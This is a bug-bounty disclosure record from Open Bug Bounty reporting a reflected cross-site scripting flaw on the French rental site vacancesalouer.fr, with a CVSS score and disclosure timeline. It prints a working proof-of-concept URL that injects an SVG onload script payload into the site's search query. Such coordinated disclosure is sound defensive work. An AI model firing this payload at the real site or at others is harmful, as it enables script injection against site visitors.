vacancesalouer.fr XSS vulnerability

2017-12-21T03:42:00
ID OBB:456435
Type openbugbounty
Reporter Rashed_Naamani
Modified 2018-03-21T03:42:00

Description

Open Bug Bounty ID: OBB-456435

Description| Value
---|---
Affected Website:| vacancesalouer.fr
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.vacancesalouer.fr/advanced_search.php?query=%27%22%3E%3Csvg%2Fonload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&hide;_advanced_option_by_user=0&continent;=0&country;=0&country;_hidden=&region1;=0&region2;=0&minprice;_input=&currency;=4&price;=7&maxprice;_input=#_persons=1&start;_date=&end;_date=&acc;_check%5B%5D=13&acc;_check%5B%5D=14&acc;_check%5B%5D=15&acc;_check%5B%5D=16&acc;_check%5B%5D=48&acc;_check%5B%5D=49&acc;_check%5B%5D=50&acc;_check%5B%5D=52&acc;_check%5B%5D=53
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 21 December, 2017 03:42 GMT
Vulnerability Verified:| 21 December, 2017 03:45 GMT
Website Operator Notified:| 21 December, 2017 03:45 GMT
Vulnerability Published:| 21 December, 2017 03:45 GMT[without any technical details]
Public Disclosure:| 21 March, 2018 03:42 GMT